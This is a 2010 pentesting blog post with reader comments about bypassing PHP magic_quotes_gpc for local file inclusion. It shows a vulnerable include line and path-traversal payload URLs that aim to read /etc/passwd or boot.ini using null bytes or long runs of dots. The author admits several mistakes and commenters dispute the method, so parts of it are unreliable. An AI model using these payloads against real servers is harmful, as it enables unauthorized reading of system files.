www.notsosecure.com

From Pentesters To Pentesters

2
Feb

Local File Inclusion with Magic_quotes_gpc enabled

by sid
Research

So, lets look at a piece of code:

<?php include(’inc/’.$_GET['page'].’php’); ?>

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.

How to bypass this: it you add a large number of dots (…..) than the null byte will not get escaped null byte is not required. e.g.

vuln.php?page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)

vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)

Correction: You don’t need null byte here.

Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link

tested on php version: 5.2.12 (wamp environment)

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar

9 Comments
347

9 Comments

  1. Bernardo
    11:45 am on February 2nd, 2010

    Good one Sid!

  2. s3th
    12:04 pm on February 2nd, 2010

    i wanna see a printscreen :)

  3. Bogdan Calin
    12:13 pm on February 2nd, 2010

    No, it’s not about the null byte. It works like this vuln.php?page=../../../../../etc/passwd….(lots of dots). With the null byte it doesn’t work.

    It only works on Windows AND it only works if the include is relative.

    If you have something like:
    include “d:\\xampp\\htdocs\\test\\” . $_GET['i'] . “.txt”; it doesn’t work.

  4. sid
    12:18 pm on February 2nd, 2010

    Hi Bogan,

    i have only tested it on windows, while the backslash(\) will get escaped by magic quote the forward slash will not be escaped, so that explains why it will only work if include is relational in windows.

    I can confirm that in my windows setup, it worked with null byte. As you pointed out, it doesn’t work with null byte and the null byte is actually not required.

  5. skully
    4:07 pm on February 2nd, 2010

    Hi,
    Very interesting only I am not able to reproduce it. I tested from 100 to > 4096 dots, this does not disable the NULL byte from being escaped.

    You say you tested on WAMP ? ie: Windows ? How can /etc/passwd work on windows ?

    I tried in windows also, and it failed. Could you please explain or give poc code ?

    Thanks

  6. sid
    4:16 pm on February 2nd, 2010

    Hi skully, please see the update, you dont need magic quote at all. I managed to make so many mistakes in a small blog post :(

  7. kuza55
    6:16 am on February 3rd, 2010

    Similar stuff is possible on linux: http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/

  8. Week 5 in Review | Infosec Events
    2:28 pm on February 8th, 2010

    [...] Local File Inclusion with Magic_quotes_gpc enabled – notsosecure.com Penetration using magic_quote_gpc and PHP [...]

  9. 7b-ly.com
    8:42 pm on May 24th, 2010

    i did try whit etc/passwd%00
    but that does not work
    any ideal ?

 
Entries (RSS) and Comments (RSS).